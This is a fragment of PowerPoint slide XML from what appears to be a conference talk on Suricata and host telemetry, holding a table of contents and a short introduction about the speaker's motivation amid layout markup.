            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 8"/>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17/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="AutoShape 9"/>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11" name="Freeform 11"/>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5598218" y="2099209"/>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3476141" y="5677406"/>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2042808" y="1368195"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="AutoShape 15"/>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6" name="AutoShape 16"/>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17" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3337075" y="8295219"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="AutoShape 18"/>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9" name="AutoShape 19"/>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15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 3"/>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02/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 4"/>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913220" y="4784207"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 7"/>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 8"/>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913220" y="6460607"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Freeform 10"/>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 11"/>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913220" y="8137007"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 13"/>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 14"/>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11131624" y="2596090"/>
            <a:ext cx="6652765" cy="665276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51AF6"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10783354" y="2577199"/>
            <a:ext cx="6652765" cy="665276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3"/>
              <a:stretch>
                <a:fillRect l="-25046" r="-25046"/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966308" y="-2821344"/>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2590800" y="6571882"/>
            <a:ext cx="7493735" cy="629018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Answers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577211" y="5047882"/>
            <a:ext cx="6490589" cy="629018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>The problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741283" y="5067300"/>
            <a:ext cx="1769968" cy="796372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741283" y="6800850"/>
            <a:ext cx="1769968" cy="796372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741283" y="8401050"/>
            <a:ext cx="1769968" cy="796372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="5676900"/>
            <a:ext cx="7067214" cy="394275"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>What are the real challenges? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="7353300"/>
            <a:ext cx="7067214" cy="394275"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>A solution approach? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="8919210"/>
            <a:ext cx="7067214" cy="394275"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Detailed explanation of one approach. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="8191500"/>
            <a:ext cx="15541306" cy="613630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>How Suricata and Host Telemetry Work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971799" y="1599585"/>
            <a:ext cx="12533150" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="7235"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6029" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C51AF6"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>TABLE OF CONTENTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4925769" y="438346"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="AutoShape 31"/>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32" name="AutoShape 32"/>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33" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="16801622" y="2704430"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="AutoShape 34"/>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35" name="AutoShape 35"/>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
        <p:nvSpPr>
          <p:cNvPr id="36" name="Freeform 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16819463" y="9439334"/>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7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2802B76-731C-6A0C-A860-DA3636110B77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="936107" y="3107807"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26FA748-E10B-89BB-5A9B-8C44C63EF539}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5ECC85D-45C1-9040-7FE2-D1DFABB6DF2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{631D9E71-3C49-580B-8756-E8CB6AE75686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="3371482"/>
            <a:ext cx="6490589" cy="629018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C4EDA4-979A-A6E2-30F8-160148812C22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3448050"/>
            <a:ext cx="1769968" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9EA3472-9614-2300-6849-4F4771318EFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2610186" y="3966210"/>
            <a:ext cx="7067214" cy="394275"/>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>How did I get here?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1143736" y="1890718"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>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71799" y="0"/>
            <a:ext cx="16306551" cy="876692"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="21742068" cy="1168922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 6"/>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03/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 7"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2671193" y="5474374"/>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a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13312802" y="1511189"/>
            <a:ext cx="3485388" cy="6896440"/>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FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 1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12628" r="-112628"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>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4" name="Freeform 1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20" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021120" y="2154878"/>
            <a:ext cx="9268639" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="7235"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6029" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="C51AF6"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>INTRODUCTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971799" y="2141802"/>
            <a:ext cx="1769968" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021120" y="3586028"/>
            <a:ext cx="9268639" cy="3010376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>This talk started from an enjoyment of this user conference over the years and the thought how could I kill two birds with one stone and present a Suricata talk that I could tie to the SANS Linux Forensics course that I was studying for at the time I brainstormed this idea. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8490577" y="876692"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="AutoShape 24"/>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5" name="AutoShape 25"/>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26" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17391882" y="7740153"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="AutoShape 27"/>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8" name="AutoShape 28"/>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29" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15055496" y="13909196"/>
